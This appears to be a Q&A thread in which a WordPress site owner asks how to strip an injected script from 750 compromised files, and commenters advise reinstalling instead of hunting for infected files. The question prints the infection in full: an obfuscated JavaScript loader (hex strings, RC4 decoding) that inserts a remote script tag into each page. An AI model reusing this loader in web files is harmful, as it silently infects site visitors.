# Cleaning infected site files from malicious code

Tags: shell-script, php, malware, wordpress

I got 750 files that have injected by malicious code, and here is the code  :

```
var _0x6eea=["\x56\x79\x7A\x43\x6B\x63\x4B\x65\x77\x37\x67\x39\x64\x43\x6C\x36\x77\x70\x6E\x43\x6F\x63\x4F\x57\x51\x38\x4B\x57\x63\x57\x44\x44\x74\x47\x67\x63\x77\x70\x6B\x3D","\x4D\x73\x4B\x76\x77\x34\x72\x44\x6A\x4D\x4B\x6B\x59\x77\x37\x43\x69\x57\x6A\x43\x71\x38\x4F\x57\x56\x77\x3D\x3D","\x63\x38\x4B\x43\x77\x6F\x66\x43\x71\x63\x4F\x6B\x77\x71\x41\x7A\x77\x70\x76\x44\x73\x63\x4F\x64","\x45\x73\x4B\x4B\x42\x33\x63\x35\x53\x77\x3D\x3D","\x62\x57\x37\x43\x6E\x52\x2F\x44\x67\x73\x4B\x78\x45\x63\x4F\x72\x4A\x6D\x6A\x44\x76\x77\x37\x44\x75\x77\x3D\x3D","\x77\x70\x72\x43\x73\x63\x4F\x4D\x77\x71\x7A\x43\x69\x52\x70\x42\x42\x47\x6F\x3D","\x46\x44\x6A\x44\x73\x38\x4F\x6C\x77\x6F\x70\x65\x77\x72\x31\x5A\x46\x51\x3D\x3D","\x47\x43\x2F\x43\x6B\x4D\x4B\x31\x77\x37\x63\x73\x63\x43\x4E\x36\x77\x34\x58\x44\x75\x38\x4B\x30\x51\x63\x4F\x69\x5A\x6D\x62\x44\x69\x43\x6B\x46\x77\x6F\x6E\x44\x6A\x79\x78\x4B\x77\x36\x73\x6C\x77\x35\x64\x61\x77\x6F\x5A\x56\x77\x70\x45\x78\x77\x35\x37\x44\x68\x63\x4B\x79\x5A\x4D\x4F\x79\x77\x35\x48\x44\x6D\x4D\x4F\x6E\x54\x57\x49\x72\x52\x38\x4F\x2F\x4A\x63\x4F\x65\x45\x57\x58\x43\x75\x6D\x5A\x4C\x77\x71\x54\x44\x6F\x73\x4B\x59\x77\x70\x76\x44\x70\x4D\x4B\x58\x77\x72\x58\x44\x6C\x55\x38\x30\x77\x70\x2F\x44\x76\x43\x31\x46\x59\x44\x72\x43\x6E\x47\x55\x57\x4B\x38\x4B\x71\x77\x35\x67\x55\x64\x69\x70\x35\x77\x71\x50\x44\x6B\x4D\x4B\x2F\x77\x37\x34\x54\x77\x36\x4C\x44\x72\x78\x49\x55\x77\x34\x62\x44\x69\x46\x4C\x43\x6F\x63\x4F\x4D\x4D\x31\x4C\x44\x71\x52\x78\x4C\x49\x4D\x4F\x58\x77\x6F\x67\x6F\x77\x37\x56\x62\x5A\x63\x4B\x4F\x57\x38\x4B\x74\x4C\x63\x4F\x45\x77\x6F\x63\x54\x77\x36\x6B\x74\x77\x70\x78\x5A\x77\x70\x4A\x34\x58\x6C\x54\x43\x68\x54\x77\x42\x61\x73\x4B\x58\x77\x36\x54\x44\x67\x73\x4B\x75\x77\x34\x76\x43\x69\x47\x4D\x57\x63\x30\x30\x44\x59\x53\x70\x72\x77\x36\x4E\x35\x77\x72\x46\x47\x77\x6F\x68\x4E\x77\x6F\x6A\x43\x6F\x30\x46\x50\x77\x70\x4C\x43\x76\x63\x4F\x67\x45\x33\x73\x36\x77\x37\x4C\x44\x6A\x63\x4B\x33\x77\x71\x37\x43\x6F\x63\x4B\x65\x62\x6A\x6F\x2B\x64\x63\x4F\x4C\x77\x36\x74\x59\x49\x38\x4F\x32\x4A\x77\x6E\x44\x71\x43\x41\x54\x5A\x73\x4F\x78\x56\x4D\x4B\x57\x77\x35\x7A\x44\x72\x46\x4A\x48\x77\x35\x38\x69\x51\x47\x62\x44\x6E\x30\x51\x4B\x77\x34\x33\x44\x6D\x73\x4B\x77\x77\x37\x64\x6D\x61\x32\x44\x43\x6C\x38\x4F\x47\x77\x36\x42\x37\x58\x48\x76\x43\x6F\x73\x4B\x7A\x45\x79\x37\x44\x6C\x55\x49\x56\x77\x36\x42\x55\x51\x4D\x4F\x4F\x63\x73\x4B\x68\x77\x37\x6E\x44\x69\x45\x72\x44\x75\x6A\x6F\x55\x63\x6A\x7A\x44\x72\x7A\x51\x74\x77\x37\x72\x43\x75\x77\x6E\x44\x6F\x73\x4F\x5A\x59\x45\x4D\x78\x77\x6F\x77\x6F\x77\x72\x74\x2B\x77\x37\x37\x43\x73\x4D\x4B\x6C\x54\x55\x33\x44\x69\x7A\x6B\x44\x77\x35\x55\x77\x62\x73\x4B\x70\x4C\x73\x4F\x4B\x77\x35\x48\x43\x67\x38\x4F\x45\x56\x4D\x4F\x62\x55\x38\x4B\x70\x77\x36\x6E\x43\x72\x4D\x4B\x2B\x61\x6C\x4C\x44\x6F\x63\x4F\x57\x4C\x4D\x4B\x44\x77\x6F\x7A\x44\x6D\x63\x4B\x50\x77\x35\x33\x44\x69\x67\x6A\x43\x6A\x73\x4F\x42\x4F\x33\x48\x44\x74\x6B\x7A\x44\x75\x73\x4F\x71\x77\x70\x76\x44\x68\x6C\x59\x57\x53\x41\x50\x43\x6F\x38\x4F\x77\x77\x6F\x30\x68\x61\x78\x73\x74\x66\x6B\x7A\x43\x6C\x63\x4F\x6C\x77\x70\x46\x56\x5A\x54\x49\x63\x77\x34\x4D\x74\x51\x7A\x6B\x65\x77\x35\x2F\x44\x6A\x4D\x4B\x30\x41\x63\x4F\x77\x56\x63\x4F\x39\x77\x36\x63\x52\x57\x73\x4F\x68\x77\x37\x74\x61\x77\x6F\x37\x43\x73\x30\x50\x44\x74\x63\x4F\x52\x77\x72\x58\x44\x6B\x38\x4F\x61\x77\x72\x6A\x44\x6C\x41\x46\x69\x77\x36\x37\x44\x67\x73\x4B\x74\x4D\x63\x4B\x71\x49\x43\x4C\x43\x6F\x41\x62\x44\x6E\x4D\x4F\x76\x77\x72\x30\x37\x41\x73\x4F\x74\x53\x68\x63\x45\x77\x72\x52\x51\x43\x73\x4B\x47\x64\x38\x4B\x61\x45\x47\x67\x70\x45\x54\x78\x2F\x77\x6F\x6A\x44\x6B\x38\x4F\x50\x63\x78\x4D\x73\x77\x70\x30\x50\x77\x72\x54\x43\x70\x56\x44\x43\x6E\x73\x4B\x42\x77\x72\x6E\x44\x6D\x55\x6E\x44\x74\x63\x4F\x69\x77\x71\x45\x4F\x77\x6F\x50\x43\x70\x38\x4F\x59\x58\x38\x4B\x62\x47\x73\x4F\x44\x53\x51\x6F\x4A\x77\x36\x63\x63\x77\x72\x58\x43\x71\x4D\x4B\x73\x77\x70\x6A\x44\x6C\x4D\x4B\x4E\x59\x45\x58\x44\x69\x31\x48\x44\x74\x38\x4F\x6F\x77\x72\x70\x72\x77\x35\x37\x44\x74\x32\x77\x6F\x44\x63\x4B\x61\x77\x37\x62\x43\x73\x63\x4F\x71\x53\x4D\x4B\x55\x77\x71\x50\x43\x74\x73\x4F\x6C\x52\x4D\x4F\x43\x4F\x30\x35\x65\x77\x34\x76\x44\x6F\x4D\x4B\x46\x77\x35\x64\x44\x77\x70\x41\x73\x77\x6F\x74\x2B\x77\x34\x6F\x72\x47\x58\x6C\x73\x77\x70\x30\x71\x58\x63\x4F\x73\x4B\x4D\x4F\x6A\x77\x71\x58\x43\x6F\x4D\x4B\x72\x77\x36\x73\x30\x62\x63\x4F\x2B\x77\x36\x56\x6C\x55\x6E\x76\x43\x68\x73\x4F\x4D\x77\x36\x35\x50\x77\x36\x54\x44\x76\x78\x76\x43\x68\x43\x33\x44\x71\x4D\x4B\x7A\x77\x6F\x70\x56\x77\x36\x4C\x43\x74\x33\x74\x59\x64\x6A\x62\x44\x6E\x6D\x30\x65\x45\x53\x48\x44\x74\x73\x4B\x64\x77\x37\x59\x52\x77\x6F\x58\x43\x67\x56\x64\x53\x77\x34\x4C\x44\x74\x63\x4B\x35\x66\x73\x4B\x63\x77\x72\x6F\x55\x77\x70\x7A\x43\x76\x38\x4F\x32\x56\x31\x44\x44\x6D\x6B\x58\x44\x68\x52\x51\x4C\x47\x73\x4F\x6B\x77\x6F\x6C\x32\x4A\x63\x4B\x56\x77\x34\x56\x74\x77\x35\x66\x43\x67\x51\x6C\x6C\x44\x73\x4F\x67\x77\x72\x6A\x44\x74\x4D\x4F\x2B\x4B\x6D\x73\x36\x77\x35\x39\x6A\x77\x37\x37\x43\x68\x31\x44\x43\x73\x44\x52\x69\x77\x34\x33\x43\x6F\x33\x6E\x43\x73\x63\x4F\x59\x77\x36\x6C\x72\x77\x72\x70\x33\x58\x73\x4B\x36\x77\x72\x6F\x70\x77\x71\x6A\x43\x6D\x63\x4F\x30\x77\x70\x55\x4F\x63\x6C\x48\x44\x6B\x69\x76\x43\x75\x48\x4C\x44\x6B\x63\x4B\x72\x77\x35\x66\x44\x70\x45\x76\x44\x70\x32\x76\x43\x75\x38\x4B\x32\x4E\x67\x54\x44\x69\x38\x4F\x6A\x77\x37\x44\x44\x73\x63\x4F\x4F\x46\x73\x4B\x49\x77\x70\x62\x44\x6E\x58\x59\x37\x77\x6F\x38\x39\x52\x77\x44\x43\x69\x63\x4B\x58\x62\x47\x56\x6E\x49\x42\x62\x44\x6D\x4D\x4F\x45\x77\x35\x62\x43\x6B\x38\x4F\x4D\x52\x4D\x4F\x77\x64\x4D\x4B\x50\x77\x35\x54\x44\x6D\x32\x45\x31\x77\x72\x37\x44\x6A\x57\x37\x44\x74\x73\x4F\x32\x41\x63\x4F\x56\x77\x36\x67\x65\x55\x54\x77\x2F\x77\x34\x4D\x73\x77\x71\x6B\x2B\x77\x37\x48\x44\x75\x4D\x4B\x6E\x77\x72\x38\x31\x4E\x4D\x4B\x58\x77\x36\x33\x44\x74\x6A\x66\x43\x67\x73\x4B\x6B\x77\x37\x64\x39\x77\x6F\x50\x43\x6E\x56\x70\x42\x77\x36\x31\x6F\x42\x4D\x4B\x39\x65\x78\x63\x4D\x55\x73\x4F\x73\x4A\x73\x4B\x2B\x61\x38\x4B\x53\x55\x31\x42\x4A\x53\x4D\x4F\x74\x66\x48\x70\x51\x77\x70\x6A\x44\x6F\x73\x4F\x63\x77\x35\x6E\x44\x6F\x63\x4F\x52\x77\x35\x45\x6B\x77\x71\x4C\x44\x6F\x4D\x4F\x42\x77\x6F\x35\x35\x77\x34\x6A\x44\x69\x33\x34\x75\x63\x38\x4F\x43\x44\x48\x6A\x43\x68\x33\x6E\x44\x6A\x43\x48\x44\x67\x73\x4B\x52\x4B\x73\x4F\x6F\x77\x35\x76\x43\x68\x77\x78\x64\x77\x36\x4C\x43\x6A\x38\x4F\x5A\x57\x67\x49\x61\x77\x71\x44\x43\x68\x4D\x4F\x51\x66\x63\x4F\x6C\x77\x36\x50\x43\x75\x73\x4F\x74\x4B\x38\x4F\x2B\x77\x35\x6A\x44\x76\x38\x4B\x46\x65\x32\x59\x57\x57\x73\x4F\x36\x47\x33\x72\x44\x75\x41\x3D\x3D","\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x55\x44\x50\x4D\x49\x55","\x72\x65\x74\x75\x72\x6E\x20\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20","\x7B\x7D\x2E\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72\x28\x22\x72\x65\x74\x75\x72\x6E\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29","\x29\x3B","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","\x61\x74\x6F\x62","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x25","\x73\x6C\x69\x63\x65","\x30\x30","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x58\x70\x44\x42\x61\x53","\x53\x4A\x4E\x65\x62\x4B","\x6C\x75\x42\x49\x48\x6B","\x30\x78\x30","\x43\x31\x25\x4A","\x30\x78\x31","\x49\x39\x5A\x77","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x30\x78\x32","\x36\x65\x21\x42","\x30\x78\x33","\x5A\x41\x54\x25","\x30\x78\x34","\x76\x57\x51\x5D","\x30\x78\x35","\x30\x78\x36","\x4B\x4D\x61\x25","\x30\x78\x37","\x6C\x6A\x70\x56"];var _0x69b4=[_0x6eea[0],_0x6eea[1],_0x6eea[2],_0x6eea[3],_0x6eea[4],_0x6eea[5],_0x6eea[6],_0x6eea[7],_0x6eea[8],_0x6eea[9],_0x6eea[10],_0x6eea[11],_0x6eea[12],_0x6eea[13],_0x6eea[14],_0x6eea[15],_0x6eea[16],_0x6eea[17],_0x6eea[18],_0x6eea[19],_0x6eea[20],_0x6eea[21],_0x6eea[22],_0x6eea[23],_0x6eea[24],_0x6eea[25],_0x6eea[26],_0x6eea[27],_0x6eea[28],_0x6eea[29],_0x6eea[30],_0x6eea[31],_0x6eea[32],_0x6eea[33],_0x6eea[34],_0x6eea[35],_0x6eea[36],_0x6eea[37],_0x6eea[38],_0x6eea[39],_0x6eea[40],_0x6eea[41],_0x6eea[42],_0x6eea[43],_0x6eea[44],_0x6eea[45],_0x6eea[46],_0x6eea[47],_0x6eea[48]];var _0x53ac=[_0x69b4[0],_0x69b4[1],_0x69b4[2],_0x69b4[3],_0x69b4[4],_0x69b4[5],_0x69b4[6],_0x69b4[7]];(function(_0x130bx3,_0x130bx4){var _0x130bx5=function(_0x130bx6){while(--_0x130bx6){_0x130bx3[_0x69b4[9]](_0x130bx3[_0x69b4[8]]())}};_0x130bx5(++_0x130bx4)}(_0x53ac,0x6b));var _0x4824=function(_0x130bx8,_0x130bx9){_0x130bx8= _0x130bx8- 0x0;var _0x130bxa=_0x53ac[_0x130bx8];if(_0x4824[_0x69b4[10]]=== undefined){(function(){var _0x130bxb=function(){var _0x130bxc;try{_0x130bxc= Function(_0x69b4[11]+ _0x69b4[12]+ _0x69b4[13])()}catch(_0x21cc70){_0x130bxc= window};return _0x130bxc};var _0x130bxd=_0x130bxb();var _0x130bxe=_0x69b4[14];_0x130bxd[_0x69b4[15]]|| (_0x130bxd[_0x69b4[15]]= function(_0x130bxf){var _0x130bx10=String(_0x130bxf)[_0x69b4[17]](/=+$/,_0x69b4[16]);for(var _0x130bx11=0x0,_0x130bx12,_0x130bx13,_0x130bx14=0x0,_0x130bx15=_0x69b4[16];_0x130bx13= _0x130bx10[_0x69b4[18]](_0x130bx14++);~_0x130bx13&& (_0x130bx12= _0x130bx11% 0x4?_0x130bx12* 0x40+ _0x130bx13:_0x130bx13,_0x130bx11++ % 0x4)?_0x130bx15+= String[_0x69b4[19]](0xff& _0x130bx12>> (-0x2* _0x130bx11 & 0x6)):0x0){_0x130bx13= _0x130bxe[_0x69b4[20]](_0x130bx13)};return _0x130bx15})}());var _0x130bx16=function(_0x130bx17,_0x130bx9){var _0x130bx18=[],_0x130bx19=0x0,_0x130bx1a,_0x130bx1b=_0x69b4[16],_0x130bx1c=_0x69b4[16];_0x130bx17= atob(_0x130bx17);for(var _0x130bx1d=0x0,_0x130bx1e=_0x130bx17[_0x69b4[21]];_0x130bx1d< _0x130bx1e;_0x130bx1d++){_0x130bx1c+= _0x69b4[22]+ (_0x69b4[24]+ _0x130bx17[_0x69b4[26]](_0x130bx1d)[_0x69b4[25]](0x10))[_0x69b4[23]](-0x2)};_0x130bx17= decodeURIComponent(_0x130bx1c);for(var _0x130bx1f=0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx18[_0x130bx1f]= _0x130bx1f};for(_0x130bx1f= 0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f]+ _0x130bx9[_0x69b4[26]](_0x130bx1f% _0x130bx9[_0x69b4[21]]))% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a};_0x130bx1f= 0x0;_0x130bx19= 0x0;for(var _0x130bx20=0x0;_0x130bx20< _0x130bx17[_0x69b4[21]];_0x130bx20++){_0x130bx1f= (_0x130bx1f+ 0x1)% 0x100;_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f])% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a;_0x130bx1b+= String[_0x69b4[19]](_0x130bx17[_0x69b4[26]](_0x130bx20)^ _0x130bx18[(_0x130bx18[_0x130bx1f]+ _0x130bx18[_0x130bx19])% 0x100])};return _0x130bx1b};_0x4824[_0x69b4[27]]= _0x130bx16;_0x4824[_0x69b4[28]]= {};_0x4824[_0x69b4[10]]=  !![]};var _0x130bx21=_0x4824[_0x69b4[28]][_0x130bx8];if(_0x130bx21=== undefined){if(_0x4824[_0x69b4[29]]=== undefined){_0x4824[_0x69b4[29]]=  !![]};_0x130bxa= _0x4824[_0x69b4[27]](_0x130bxa,_0x130bx9);_0x4824[_0x69b4[28]][_0x130bx8]= _0x130bxa}else {_0x130bxa= _0x130bx21};return _0x130bxa};var _0x4739d5=[_0x4824(_0x69b4[30],_0x69b4[31]),_0x4824(_0x69b4[32],_0x69b4[33]),_0x69b4[34],_0x69b4[35],_0x69b4[36],_0x69b4[37],_0x4824(_0x69b4[38],_0x69b4[39]),_0x4824(_0x69b4[40],_0x69b4[41]),_0x4824(_0x69b4[42],_0x69b4[43]),_0x4824(_0x69b4[44],_0x69b4[43]),_0x4824(_0x69b4[45],_0x69b4[46]),_0x4824(_0x69b4[47],_0x69b4[48])];var _0x3be76d=[_0x4739d5[0x0],_0x4739d5[0x1],_0x4739d5[0x2],_0x4739d5[0x3],_0x4739d5[0x4],_0x4739d5[0x5],_0x4739d5[0x6],_0x4739d5[0x7],_0x4739d5[0x8],_0x4739d5[0x9],_0x4739d5[0xa],_0x4739d5[0xb]];var _0x4f3f17=[_0x3be76d[0x0],_0x3be76d[0x1],_0x3be76d[0x2],_0x3be76d[0x3],_0x3be76d[0x4],_0x3be76d[0x5],_0x3be76d[0x6],_0x3be76d[0x7],_0x3be76d[0x8],_0x3be76d[0x9],_0x3be76d[0xa],_0x3be76d[0xb]];var _0x4d0c89=[_0x4f3f17[0x0],_0x4f3f17[0x1],_0x4f3f17[0x2],_0x4f3f17[0x3],_0x4f3f17[0x4],_0x4f3f17[0x5],_0x4f3f17[0x6],_0x4f3f17[0x7],_0x4f3f17[0x8],_0x4f3f17[0x9],_0x4f3f17[0xa],_0x4f3f17[0xb]];var _0x572eac=[_0x4d0c89[0x0],_0x4d0c89[0x1],_0x4d0c89[0x2],_0x4d0c89[0x3],_0x4d0c89[0x4],_0x4d0c89[0x5],_0x4d0c89[0x6],_0x4d0c89[0x7],_0x4d0c89[0x8],_0x4d0c89[0x9],_0x4d0c89[0xa],_0x4d0c89[0xb]];var _0x2b0b54=[_0x572eac[0x0],_0x572eac[0x1],_0x572eac[0x2],_0x572eac[0x3],_0x572eac[0x4],_0x572eac[0x5],_0x572eac[0x6],_0x572eac[0x7],_0x572eac[0x8],_0x572eac[0x9],_0x572eac[0xa],_0x572eac[0xb]];(function(){var _0x130bx28=document[_0x2b0b54[0x1]](_0x2b0b54[0x0]);_0x130bx28[_0x2b0b54[0x2]]= _0x2b0b54[0x3];_0x130bx28[_0x2b0b54[0x4]]=  !![];_0x130bx28[_0x2b0b54[0x5]]= _0x2b0b54[0x6];_0x130bx28[_0x2b0b54[0x7]]= _0x2b0b54[0x8];var _0x130bx29=document[_0x2b0b54[0x9]](_0x2b0b54[0x0])[0x0];_0x130bx29[_0x2b0b54[0xb]][_0x2b0b54[0xa]](_0x130bx28,_0x130bx29)}());/**
```

I need to create bash script or using sed to remove only this malicious files, and not impacted to the other php code.

Comment: So, search for a string in all the files and delete the files that contain a match?

Comment: Are you actually working with a compromised system?

Comment: @炸鱼薯条德里克 yes search for a string in all lthe files and delete the files that contain a match

Comment: @Kusalananda yes i'm working with a compromised system

Comment: If you have backups, take the system offline, restore a sufficiently-old backup, patch your system, reset database passwords, and go back online. This is not quite "nuke from orbit"-levels of safe, but much better than hoping you don't need to find hidden files, less scrambled payload, etc.

Comment: @UlrichSchwarz ahem

Comment: Related: [How do I deal with a compromised server?](//serverfault.com/q/218005)

Comment: I have seen some of those infections when I managed several web sites, including a server with 400+ vhosts. Some of them install remote shells/automated exploit kits. With luck you just have infected PHPs, with very old systems where it is easy to escalate to root, all bets are off, and then  you should not even thinking twice before reinstalling everything from the ground up. As for restoring backups, what garantees do you have the malware/backdoors are already not there?

Answer (score 1):

The only solution is:

1. enable maintenance mode
2. save all Uploads (png/jpg..)
3. clean out the current wp-directory
4. reinstall the current Version
5. upgrade to newest Version
6. disable maintenance mode

I had this one time, trying to delete all infected files, but the attacker came back via several other file on regular order. 
Save your time, do not try do find infected files, clean the Thing!

Comment: Usually they are automated bots, not really humans doing the deed.